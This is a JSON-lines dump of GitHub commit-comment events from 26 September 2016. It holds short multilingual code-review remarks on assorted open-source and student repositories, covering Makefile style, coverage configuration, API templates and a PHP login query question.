{"id":"4616114911","type":"CommitCommentEvent","actor":{"login":"cgendreau"},"repo":{"name":"gbif/registry"},"payload":{"comment":{"id":19168350,"position":null,"line":null,"path":null,"commit_id":"f10f6bc304c81ebdf78f5ec63a919b7ba7049f8d","created_at":"2016-09-26T07:13:30Z","updated_at":"2016-09-26T07:13:30Z","body":"I would suggest to create CustomDownloadDataCiteConverter to not make the class DataCiteConverter too large.\r\n\r\nConstants that should be taken from DataCiteConverter class can have their visibility changed to package protected.\r\n"}},"created_at":"2016-09-26T07:13:30Z"}
{"id":"4616116417","type":"CommitCommentEvent","actor":{"login":"simonepizza93"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19168352,"position":9,"line":9,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-26T07:13:55Z","updated_at":"2016-09-26T07:13:55Z","body":"Ho sempre usato lo style in un file separato, come hai detto tu l'ho scritto direttamente qua per comodità siccome erano poche righe"}},"created_at":"2016-09-26T07:13:55Z"}
{"id":"4616118033","type":"CommitCommentEvent","actor":{"login":"simonepizza93"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19168359,"position":107,"line":107,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-26T07:14:23Z","updated_at":"2016-09-26T07:14:23Z","body":"Giusto cazzata mia"}},"created_at":"2016-09-26T07:14:23Z"}
{"id":"4616119032","type":"CommitCommentEvent","actor":{"login":"timadamson"},"repo":{"name":"swagger-api/swagger-codegen"},"payload":{"comment":{"id":19168361,"position":111,"line":103,"path":"modules/swagger-codegen/src/main/resources/typescript-angular2/api.mustache","commit_id":"4337f050f56c5e1e8c0c147a14e3f8f938dbf84d","created_at":"2016-09-26T07:14:42Z","updated_at":"2016-09-26T07:14:42Z","body":"Response type should not be set to json if the method response doesn't have a body. Causes calls to such methods to error with:\r\n\r\n\"Failed to read the 'responseText' property from 'XMLHttpRequest': The value is only accessible if the object's 'responseType' is '' or 'text' (was 'json').\""}},"created_at":"2016-09-26T07:14:42Z"}
{"id":"4616119832","type":"CommitCommentEvent","actor":{"login":"ychab"},"repo":{"name":"makinacorpus/corpus-django"},"payload":{"comment":{"id":19168363,"position":null,"line":null,"path":null,"commit_id":"2f62a85d944c875d78a709b57059310c2e848a89","created_at":"2016-09-26T07:14:58Z","updated_at":"2016-09-26T07:14:58Z","body":"Well, I din't find this is more clear... because now we have further config file. We was using setup.cfg in that way (since it was supported by coverage in its latest release). However, I can't manage to do it with only one setup.cfg :-(. Looks like the new introduce option ``usedevelop = true`` has no effect when coverage try to check its config (it didn't seems to find the setup.cfg)..."}},"created_at":"2016-09-26T07:14:58Z"}
{"id":"4616123395","type":"CommitCommentEvent","actor":{"login":"kts006"},"repo":{"name":"kts006/ChatProgaram"},"payload":{"comment":{"id":19168371,"position":5,"line":3,"path":"GitTest.txt","commit_id":"41f1e5a9748e529925316b33643be6178708f073","created_at":"2016-09-26T07:16:02Z","updated_at":"2016-09-26T07:16:02Z","body":"GitTEST Third.."}},"created_at":"2016-09-26T07:16:02Z"}
{"id":"4616123700","type":"CommitCommentEvent","actor":{"login":"timadamson"},"repo":{"name":"swagger-api/swagger-codegen"},"payload":{"comment":{"id":19168373,"position":111,"line":103,"path":"modules/swagger-codegen/src/main/resources/typescript-angular2/api.mustache","commit_id":"4337f050f56c5e1e8c0c147a14e3f8f938dbf84d","created_at":"2016-09-26T07:16:07Z","updated_at":"2016-09-26T07:16:07Z","body":"Also causes problems when a method that usually returns a JSON doesn't because of an error."}},"created_at":"2016-09-26T07:16:07Z"}
{"id":"4616130485","type":"CommitCommentEvent","actor":{"login":"simonepizza93"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19168386,"position":143,"line":143,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-26T07:18:05Z","updated_at":"2016-09-26T07:18:05Z","body":"Si non l'avevo capito che tutti i tag avessero bisogno di una classe, lavorando in 2/3 persona massimo su un sito dove lavoravo in italia non mettavamo le classi a tutti i tag, ma essendo freelancer.com un sito enorme e con tanti sviluppatori è meglio mettere le classi a ogni tag in modo da essere specifici e se qualcun'altro mette mani al tuo codice è più facile per lui capire a cosa si riferisce quel tag, sbaglio?"}},"created_at":"2016-09-26T07:18:05Z"}
{"id":"4616132108","type":"CommitCommentEvent","actor":{"login":"simonepizza93"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19168393,"position":147,"line":147,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-26T07:18:34Z","updated_at":"2016-09-26T07:18:34Z","body":"Questa cosa me l'avevi già detta, stupido io!!"}},"created_at":"2016-09-26T07:18:34Z"}
{"id":"4616133434","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19168397,"position":null,"line":null,"path":null,"commit_id":"691cfb8b39f3e9b1aa860346942f46f833b52bea","created_at":"2016-09-26T07:18:56Z","updated_at":"2016-09-26T07:18:56Z","body":"Outdated comment. (Wrong function name, check kernel version, change direction, there is no trace point on the new function)"}},"created_at":"2016-09-26T07:18:56Z"}
{"id":"4616135473","type":"CommitCommentEvent","actor":{"login":"krishnasai95"},"repo":{"name":"krishnasai95/sachin"},"payload":{"comment":{"id":19168401,"position":null,"line":null,"path":null,"commit_id":"9e4b36bdc40be5c40098bd3456810adf5da9c97d","created_at":"2016-09-26T07:19:30Z","updated_at":"2016-09-26T07:19:30Z","body":"he is great"}},"created_at":"2016-09-26T07:19:30Z"}
{"id":"4616140452","type":"CommitCommentEvent","actor":{"login":"Tagliacollo"},"repo":{"name":"Tagliacollo/PartitionUCE"},"payload":{"comment":{"id":19168407,"position":null,"line":null,"path":null,"commit_id":"1ced87e570fce21c0cb96f864ccf5ed9fec9944d","created_at":"2016-09-26T07:20:56Z","updated_at":"2016-09-26T07:20:56Z","body":"One issue down. issue #10"}},"created_at":"2016-09-26T07:20:56Z"}
{"id":"4616143216","type":"CommitCommentEvent","actor":{"login":"htmfilho"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19168416,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T07:21:41Z","updated_at":"2016-09-26T07:21:41Z","body":"ça marche avec un string? year c'est du type IntegerField."}},"created_at":"2016-09-26T07:21:41Z"}
{"id":"4616152051","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19168437,"position":null,"line":null,"path":null,"commit_id":"536ef569e883f9a0eb54df4702a64ccedca2fcce","created_at":"2016-09-26T07:24:09Z","updated_at":"2016-09-26T07:24:09Z","body":"Good luck with this trick! :-)"}},"created_at":"2016-09-26T07:24:09Z"}
{"id":"4616164573","type":"CommitCommentEvent","actor":{"login":"Parisa01"},"repo":{"name":"Parisa01/practice01"},"payload":{"comment":{"id":19168464,"position":null,"line":null,"path":null,"commit_id":"52f3d798dd96e1f764394e17c99727448772dcc3","created_at":"2016-09-26T07:27:37Z","updated_at":"2016-09-26T07:27:37Z","body":"please pull and check if ok"}},"created_at":"2016-09-26T07:27:37Z"}
{"id":"4616167181","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"mathiasbynens/dotfiles"},"payload":{"comment":{"id":19168470,"position":null,"line":null,"path":null,"commit_id":"b98a6597c4b0f3a307cff17a062ee46cc8521502","created_at":"2016-09-26T07:28:23Z","updated_at":"2016-09-26T07:28:23Z","body":"Submit a PR. ;)"}},"created_at":"2016-09-26T07:28:23Z"}
{"id":"4616170919","type":"CommitCommentEvent","actor":{"login":"bubnikv"},"repo":{"name":"prusa3d/Slic3r"},"payload":{"comment":{"id":19168480,"position":null,"line":null,"path":null,"commit_id":"565146d9d1be222693901a26acb5a3c65dd8ac65","created_at":"2016-09-26T07:29:23Z","updated_at":"2016-09-26T07:29:23Z","body":"Just switch to a relative extruder coordinates and try to build any vase object. The spiral will run sigificantly faster up than it should.\r\n"}},"created_at":"2016-09-26T07:29:23Z"}
{"id":"4616171403","type":"CommitCommentEvent","actor":{"login":"cverver"},"repo":{"name":"cverver/Brotherhood"},"payload":{"comment":{"id":19168483,"position":null,"line":null,"path":null,"commit_id":"a6b03ebfe45ed3776d468d88da56788994dcfb58","created_at":"2016-09-26T07:29:30Z","updated_at":"2016-09-26T07:29:30Z","body":"👍 "}},"created_at":"2016-09-26T07:29:30Z"}
{"id":"4616176009","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"perl11/cperl"},"payload":{"comment":{"id":19168495,"position":null,"line":null,"path":null,"commit_id":"b92f44fc3e2571a1138ef88967892b96058ada30","created_at":"2016-09-26T07:30:46Z","updated_at":"2016-09-26T07:30:46Z","body":"Can you please push this branch with the 2 win32 commits again? \r\nIt's gone from the perl11 repro, and I want to merge it."}},"created_at":"2016-09-26T07:30:46Z"}
{"id":"4616177365","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19168499,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-26T07:31:09Z","updated_at":"2016-09-26T07:31:09Z","body":"@taschini  This is actually doubling tox.ini :\r\n``` python\r\ncommands =\r\n    coverage run --source morepath -m py.test morepath {posargs}\r\n    coverage report -m --fail-under=100\r\n```\r\nHere we have `--source morepath` and the `report -m` flag means `show_missing = True`. \r\n\r\nI would prefer not to have another file to look for configuration. "}},"created_at":"2016-09-26T07:31:09Z"}
{"id":"4616181458","type":"CommitCommentEvent","actor":{"login":"sky2day"},"repo":{"name":"krislox/Bank-Account"},"payload":{"comment":{"id":19168508,"position":null,"line":null,"path":null,"commit_id":"d46825ffd42b375c5c17033a47b93d6a60a520aa","created_at":"2016-09-26T07:32:16Z","updated_at":"2016-09-26T07:32:16Z","body":"Van,\n\nI was working from another comp and didn't want to mess with GIT, too late\ntoday. Please see 2 files attached. I've changed some code. Tomorrow I'll\ntry to push them to GIThub. You can commit my changes and add to GitHub\nyourself, so you'll see all the changes highlighted.\nVery good job, lots of lines! To see the minor problem in your current\nprogram try to withdraw all the money to zero. Program quits and it\nshouldn't.\nPlease try the code I've attached: progam will quit only when user chooses\noption 5.\nAlso there are some other updates: program will ask user for valid amount\nfor withdrawal or deposit until he will provide one. Currently if amount is\nnot valid, user is thrown to main menu.\nI've also updated constructor and\nThis is it. Please see if my code works well and then, if everything looks\nfine, we can submit.\n\nTake care,\nAndrei\n\n2016-09-25 20:44 GMT-07:00 Van Ralf Aguas <notifications@github.com>:\n\n> Thank you Andrei\n> > On Sep 25, 2016, at 8:39 PM, sky2day <notifications@github.com <mailto:\n> notifications@github.com>> wrote:\n> >\n> > Hi Van,\n> > I looked through your code and run the program. There are couple bugs in\n> program behavior. I'll try to fix them today and will let you know.\n> > Andrei\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub <\n> https://github.com/krislox/Bank-Account/commit/\n> d46825ffd42b375c5c17033a47b93d6a60a520aa#commitcomment-19167194>, or mute\n> the thread <https://github.com/notifications/unsubscribe-\n> auth/AGqJLaYuF0luU8RwpM7O-NwG3ge-XU01ks5qtz6MgaJpZM4KGHNg>.\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/krislox/Bank-Account/commit/d46825ffd42b375c5c17033a47b93d6a60a520aa#commitcomment-19167223>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQkVh6k8MRtpwgmm5BeqWN0uzOWCImBOks5qtz-IgaJpZM4KGHNg>\n> .\n>\n"}},"created_at":"2016-09-26T07:32:16Z"}
{"id":"4616183505","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19168511,"position":null,"line":null,"path":null,"commit_id":"b15e6411beef1c854f0b30af7c814f33ccef3715","created_at":"2016-09-26T07:32:45Z","updated_at":"2016-09-26T07:32:45Z","body":"#13 "}},"created_at":"2016-09-26T07:32:45Z"}
{"id":"4616188622","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"JJ/IV16-17"},"payload":{"comment":{"id":19168516,"position":null,"line":null,"path":null,"commit_id":"a6200ba17722cf8fab8c70de14f166040a9f4e47","created_at":"2016-09-26T07:34:05Z","updated_at":"2016-09-26T07:34:05Z","body":"Ahora el problema es que está desactualizado porque algunos compañeros tuyos ya han entregado este hito. Actualiza desde el original y vuelve a mandarlo. "}},"created_at":"2016-09-26T07:34:05Z"}
{"id":"4616191215","type":"CommitCommentEvent","actor":{"login":"half2me"},"repo":{"name":"ratchetphp/Ratchet"},"payload":{"comment":{"id":19168521,"position":null,"line":null,"path":null,"commit_id":"6da3b04e2d2cb1fb04fd6e3288ed8c2942ba4f94","created_at":"2016-09-26T07:34:47Z","updated_at":"2016-09-26T07:34:47Z","body":"Do I have to call these ping functions manually, or is there some parameter I can turn on, and have this auto-scheduled in the loop?"}},"created_at":"2016-09-26T07:34:47Z"}
{"id":"4616193408","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19168523,"position":40,"line":307,"path":"modules/mediacodec_dec/mediacodec_dec.c","commit_id":"939e436cf88cdffd92b94bea7eb1f4a51247187b","created_at":"2016-09-26T07:35:22Z","updated_at":"2016-09-26T07:35:22Z","body":"@jeanlf would you agree to rename 'GF_PIXEL_YPVU' in 'GF_PIXEL_NV12'?"}},"created_at":"2016-09-26T07:35:22Z"}
{"id":"4616200076","type":"CommitCommentEvent","actor":{"login":"nhantdn"},"repo":{"name":"MaryOleksiuk/newsapp"},"payload":{"comment":{"id":19168534,"position":null,"line":null,"path":null,"commit_id":"25ab6172dff265eb3ded8a23667dcc69d6e258f3","created_at":"2016-09-26T07:37:08Z","updated_at":"2016-09-26T07:37:08Z","body":"Dear Mary,\r\nI see the `node_modules` here, you can ignore it by creating a `.gitignore` and add this line `node_modules`, then you won't accidentally commit the directory again."}},"created_at":"2016-09-26T07:37:08Z"}
{"id":"4616205453","type":"CommitCommentEvent","actor":{"login":"regularfry"},"repo":{"name":"BytemarkHosting/flexnbd-c"},"payload":{"comment":{"id":19168546,"position":null,"line":null,"path":null,"commit_id":"1fefe1a6698e30b516b8de3bc2a2a8a00bbf1dc3","created_at":"2016-09-26T07:38:38Z","updated_at":"2016-09-26T07:38:38Z","body":"Ooh, good catch"}},"created_at":"2016-09-26T07:38:38Z"}
{"id":"4616206190","type":"CommitCommentEvent","actor":{"login":"ruslo"},"repo":{"name":"qedsoftware/crashup"},"payload":{"comment":{"id":19168547,"position":24,"line":45,"path":"USAGE.md","commit_id":"6ebb2d8a270d67ecfb38fbf0913dd353371325da","created_at":"2016-09-26T07:38:51Z","updated_at":"2016-09-26T07:38:51Z","body":"@wojtex Works for me. If you have any issues please provide details in corresponding slack channel."}},"created_at":"2016-09-26T07:38:51Z"}
{"id":"4616213619","type":"CommitCommentEvent","actor":{"login":"jeanlf"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19168564,"position":null,"line":null,"path":null,"commit_id":"939e436cf88cdffd92b94bea7eb1f4a51247187b","created_at":"2016-09-26T07:40:44Z","updated_at":"2016-09-26T07:40:44Z","body":"no they are not the same,  GF_PIXEL_YPVU has VU interleaved (iOS) while NV12 has UV interleaved ..."}},"created_at":"2016-09-26T07:40:44Z"}
{"id":"4616216718","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"CheHsuan/compute-pi"},"payload":{"comment":{"id":19168573,"position":3,"line":2,"path":"Makefile","commit_id":"e3ef1f8449e9df79c00328818de209573ecd5e9a","created_at":"2016-09-26T07:41:35Z","updated_at":"2016-09-26T07:41:35Z","body":"Don't add trailing space."}},"created_at":"2016-09-26T07:41:35Z"}
{"id":"4616217743","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"CheHsuan/compute-pi"},"payload":{"comment":{"id":19168576,"position":7,"line":6,"path":"Makefile","commit_id":"e3ef1f8449e9df79c00328818de209573ecd5e9a","created_at":"2016-09-26T07:41:51Z","updated_at":"2016-09-26T07:41:51Z","body":"Follow the consistent coding style."}},"created_at":"2016-09-26T07:41:51Z"}
{"id":"4616219181","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"pexcn/SimpleUtils"},"payload":{"comment":{"id":19168578,"position":null,"line":null,"path":null,"commit_id":"0cf0083bf25e5284dfc4b66f6f8e1ed74e2553a9","created_at":"2016-09-26T07:42:15Z","updated_at":"2016-09-26T07:42:15Z","body":"@aa65535 嗯，这个我知道，但是例如弹出一个 Dialog， Context 必须为 Activity 类型。\r\n所以我想搞一个通用的 Context 引用，可以很方便的获取当前 Activity 的 Context.\r\n\r\n后来我做了一些修改：https://github.com/pexcn/SimpleUtils/commit/40df5c437ae3b25e9e52bfc3fac5d6e87901f453\r\n\r\n但是总觉得哪里不对劲... 请问您有其它可以实现以上想法的方式吗？"}},"created_at":"2016-09-26T07:42:15Z"}
{"id":"4616219901","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"CheHsuan/compute-pi"},"payload":{"comment":{"id":19168584,"position":32,"line":138,"path":"computepi.c","commit_id":"e3ef1f8449e9df79c00328818de209573ecd5e9a","created_at":"2016-09-26T07:42:26Z","updated_at":"2016-09-26T07:42:26Z","body":"Use `astyle` for consistent coding style!"}},"created_at":"2016-09-26T07:42:26Z"}
{"id":"4616220825","type":"CommitCommentEvent","actor":{"login":"NejcZdovc"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19168588,"position":null,"line":null,"path":null,"commit_id":"40a67f632ce17746fa8646a10fa6e06e54eea538","created_at":"2016-09-26T07:42:40Z","updated_at":"2016-09-26T07:42:40Z","body":"There is also issue for that #3045."}},"created_at":"2016-09-26T07:42:40Z"}
{"id":"4616222543","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168589,"position":25,"line":26,"path":"issue18/login.php","commit_id":"144bedb9cd4bae0815a222fc2f8a9e3b0558d397","created_at":"2016-09-26T07:43:08Z","updated_at":"2016-09-26T07:43:08Z","body":"$stmt = $pdo->query(\"SELECT password FROM users WHERE  name=:name\");\r\nこちら上記のように書き換えるとエラーが出てしまうようなのですが、こういった場合どのように検索するべきでしょうか？"}},"created_at":"2016-09-26T07:43:08Z"}
{"id":"4616223043","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"snoopy831002/raytracing"},"payload":{"comment":{"id":19168593,"position":5,"line":7,"path":"Makefile","commit_id":"51b94a55dd53340c7c8b7b4515f12eaf74de59f5","created_at":"2016-09-26T07:43:17Z","updated_at":"2016-09-26T07:43:17Z","body":"Don't change that."}},"created_at":"2016-09-26T07:43:17Z"}
{"id":"4616225105","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"snoopy831002/raytracing"},"payload":{"comment":{"id":19168595,"position":null,"line":null,"path":null,"commit_id":"51b94a55dd53340c7c8b7b4515f12eaf74de59f5","created_at":"2016-09-26T07:43:51Z","updated_at":"2016-09-26T07:43:51Z","body":"These changes have no common point with your subject of GIT commit messages."}},"created_at":"2016-09-26T07:43:51Z"}
{"id":"4616225736","type":"CommitCommentEvent","actor":{"login":"horacekj"},"repo":{"name":"fi-ksi/web-frontend"},"payload":{"comment":{"id":19168596,"position":null,"line":null,"path":null,"commit_id":"e092c4a9a1865608ac7226bafc821b69cf9b62e3","created_at":"2016-09-26T07:44:01Z","updated_at":"2016-09-26T07:44:01Z","body":"@effa Na základě e-mailu na ksi@fi.muni.cz jsem přidal další otázku a odpověď do FAQ. Prosím o recenzi, zejména po oficiální stránce (kdysi jsi mi říkal, že nemžeme tlumočit oficiální názor FI...)"}},"created_at":"2016-09-26T07:44:01Z"}
{"id":"4616227480","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"snoopy831002/raytracing"},"payload":{"comment":{"id":19168606,"position":null,"line":null,"path":null,"commit_id":"539281287cd609ef97a66d036fdd367333d678dc","created_at":"2016-09-26T07:44:29Z","updated_at":"2016-09-26T07:44:29Z","body":"Improve your GIT commit message! Read this article carefully: http://chris.beams.io/posts/git-commit/"}},"created_at":"2016-09-26T07:44:29Z"}
{"id":"4616228691","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"FZzzz/raytracing"},"payload":{"comment":{"id":19168617,"position":16,"line":40,"path":"math-toolkit.h","commit_id":"c21fa687056aae0478675711915967be67d371b1","created_at":"2016-09-26T07:44:50Z","updated_at":"2016-09-26T07:44:50Z","body":"Don't leave the dead code."}},"created_at":"2016-09-26T07:44:50Z"}
{"id":"4616231616","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168624,"position":25,"line":26,"path":"issue18/login.php","commit_id":"144bedb9cd4bae0815a222fc2f8a9e3b0558d397","created_at":"2016-09-26T07:45:36Z","updated_at":"2016-09-26T07:45:36Z","body":"あ、すみません、先程質問への解答はここまで、と言うかたちでご連絡頂いてましたね。\r\n失礼しました！"}},"created_at":"2016-09-26T07:45:36Z"}
{"id":"4616231779","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"evanjack2002/raytracing-1"},"payload":{"comment":{"id":19168626,"position":8,"line":49,"path":"Makefile","commit_id":"ff77f9b35a8966036a441f3cc103c43e8556d4df","created_at":"2016-09-26T07:45:38Z","updated_at":"2016-09-26T07:45:38Z","body":"Don't move `perf` target in the section of `PROFILE`, which is not corresponding."}},"created_at":"2016-09-26T07:45:38Z"}
{"id":"4616234189","type":"CommitCommentEvent","actor":{"login":"FottyM"},"repo":{"name":"kenigbolo/Chafity"},"payload":{"comment":{"id":19168631,"position":null,"line":null,"path":null,"commit_id":"a15a8b4d6219f53a4409e05d39c8107f23f69245","created_at":"2016-09-26T07:46:15Z","updated_at":"2016-09-26T07:46:15Z","body":"Need to dig into why the tests are failing."}},"created_at":"2016-09-26T07:46:15Z"}
{"id":"4616234698","type":"CommitCommentEvent","actor":{"login":"iadev"},"repo":{"name":"kuka-isir/rtt_ros_kdl_tools"},"payload":{"comment":{"id":19168633,"position":null,"line":null,"path":null,"commit_id":"acc089ce4235cd4453e115a3c4e392db1db1ce52","created_at":"2016-09-26T07:46:23Z","updated_at":"2016-09-26T07:46:23Z","body":"Count should be > 0 (instead of < 1 )\r\nFix here https://github.com/kuka-isir/rtt_ros_kdl_tools/commit/92e6852cfc2efda61fa862f81ed27bdc770c0659"}},"created_at":"2016-09-26T07:46:23Z"}
{"id":"4616235468","type":"CommitCommentEvent","actor":{"login":"iadev"},"repo":{"name":"kuka-isir/rtt_ros_kdl_tools"},"payload":{"comment":{"id":19168636,"position":null,"line":null,"path":null,"commit_id":"92e6852cfc2efda61fa862f81ed27bdc770c0659","created_at":"2016-09-26T07:46:35Z","updated_at":"2016-09-26T07:46:35Z","body":"Fix for previous commit https://github.com/kuka-isir/rtt_ros_kdl_tools/commit/acc089ce4235cd4453e115a3c4e392db1db1ce52"}},"created_at":"2016-09-26T07:46:35Z"}
{"id":"4616242011","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19168650,"position":null,"line":null,"path":null,"commit_id":"939e436cf88cdffd92b94bea7eb1f4a51247187b","created_at":"2016-09-26T07:48:16Z","updated_at":"2016-09-26T07:48:16Z","body":"there is NV12 and NV21, one is VU interleaved and the other one is UV interleaved\r\niOS is  according to FFmpeg: https://github.com/FFmpeg/FFmpeg/blob/eae2d89bf715bc3edff478174b43e1f388e768bf/ffmpeg_videotoolbox.c#L60"}},"created_at":"2016-09-26T07:48:16Z"}
{"id":"4616250768","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168667,"position":1,"line":1,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T07:50:32Z","updated_at":"2016-09-26T07:50:32Z","body":"Okay, i get it."}},"created_at":"2016-09-26T07:50:32Z"}
{"id":"4616254845","type":"CommitCommentEvent","actor":{"login":"jeanlf"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19168676,"position":null,"line":null,"path":null,"commit_id":"939e436cf88cdffd92b94bea7eb1f4a51247187b","created_at":"2016-09-26T07:51:38Z","updated_at":"2016-09-26T07:51:38Z","body":"Oh ok I thought we were using 'GF_PIXEL_NV21' on android but no. So yes sure we can rename"}},"created_at":"2016-09-26T07:51:38Z"}
{"id":"4616261494","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168689,"position":10,"line":27,"path":"issue18/login.sql","commit_id":"a3b651d5bb78a74ff1caff1a96cc046f7cbd8c7d","created_at":"2016-09-26T07:53:19Z","updated_at":"2016-09-26T07:53:19Z","body":"すでに入っていたデータの中で名前が重複するものを削除したら入るようになりました。ありがとうございます！"}},"created_at":"2016-09-26T07:53:19Z"}
{"id":"4616263704","type":"CommitCommentEvent","actor":{"login":"bobdenotter"},"repo":{"name":"bolt/docs"},"payload":{"comment":{"id":19168691,"position":28,"line":28,"path":"docs/internals/javascript_css_build.md","commit_id":"d502e90cf1b17e80bc117c806bae7750e46ff4a6","created_at":"2016-09-26T07:53:53Z","updated_at":"2016-09-26T07:53:53Z","body":"Maybe phrase this differently, but I do want to lock down the bandwidth of versions we can use for this. As mentioned, i don't think we can remove NPM, but it will become less fickle, as we are going to strip it down. \r\n\r\n"}},"created_at":"2016-09-26T07:53:53Z"}
{"id":"4616265430","type":"CommitCommentEvent","actor":{"login":"mattock"},"repo":{"name":"chipitsine/openvpn-build"},"payload":{"comment":{"id":19168696,"position":null,"line":null,"path":null,"commit_id":"d2fc1604f4e60c2e2811309c7b0d270c4f4aff35","created_at":"2016-09-26T07:54:20Z","updated_at":"2016-09-26T07:54:20Z","body":"@chipitsine : I spent last week tweaking our buildbot setup. I'll try to get this tested this week, so that we could potentially ship 2.4-alpha1 as combined installers."}},"created_at":"2016-09-26T07:54:20Z"}
{"id":"4616266890","type":"CommitCommentEvent","actor":{"login":"Stibbons"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19168697,"position":20,"line":214,"path":"docs/submitting-applications.md","commit_id":"7db55faa70ebbd157e9ef0ee678bd972c2b5c32a","created_at":"2016-09-26T07:54:42Z","updated_at":"2016-09-26T07:54:42Z","body":"I recommend documenting it is possible to put only \"virtualenv\" to get the default installation of virtualenv"}},"created_at":"2016-09-26T07:54:42Z"}
{"id":"4616267647","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19168698,"position":6,"line":708,"path":"modules/s3/s3aaa.py","commit_id":"d0038ecc8268ad73dddb69619f102fccbfc86573","created_at":"2016-09-26T07:54:55Z","updated_at":"2016-09-26T07:54:55Z","body":"Shouldn't this be\r\n\r\n    self.register_onaccept = ...\r\n\r\nlike below (since the local variable isn't used anywhere)?"}},"created_at":"2016-09-26T07:54:55Z"}
{"id":"4616267695","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168699,"position":7,"line":49,"path":"Harekaze/Transitions/ShowDetailTransition.swift","commit_id":"af844f8f38f379392247ce179cd3302b61aafac0","created_at":"2016-09-26T07:54:56Z","updated_at":"2016-09-26T07:54:56Z","body":"Change to modern way"}},"created_at":"2016-09-26T07:54:56Z"}
{"id":"4616267880","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19168701,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-26T07:54:59Z","updated_at":"2016-09-26T07:54:59Z","body":"And in the docs we recommend \r\n```python \r\n$ py.test --cov morepath --cov-report html\r\n```\r\nSo also no need for .coverage rc here. "}},"created_at":"2016-09-26T07:54:59Z"}
{"id":"4616269119","type":"CommitCommentEvent","actor":{"login":"KiMC2"},"repo":{"name":"sku-coderface/sku-coderface.github.io"},"payload":{"comment":{"id":19168703,"position":5,"line":10,"path":"_data/authors.yml","commit_id":"29a6ab7c92a8bada34cb52393a6cb9af6398cc80","created_at":"2016-09-26T07:55:18Z","updated_at":"2016-09-26T07:55:18Z","body":"test"}},"created_at":"2016-09-26T07:55:18Z"}
{"id":"4616269798","type":"CommitCommentEvent","actor":{"login":"KiMC2"},"repo":{"name":"sku-coderface/sku-coderface.github.io"},"payload":{"comment":{"id":19168706,"position":null,"line":null,"path":null,"commit_id":"29a6ab7c92a8bada34cb52393a6cb9af6398cc80","created_at":"2016-09-26T07:55:29Z","updated_at":"2016-09-26T07:55:29Z","body":"test"}},"created_at":"2016-09-26T07:55:29Z"}
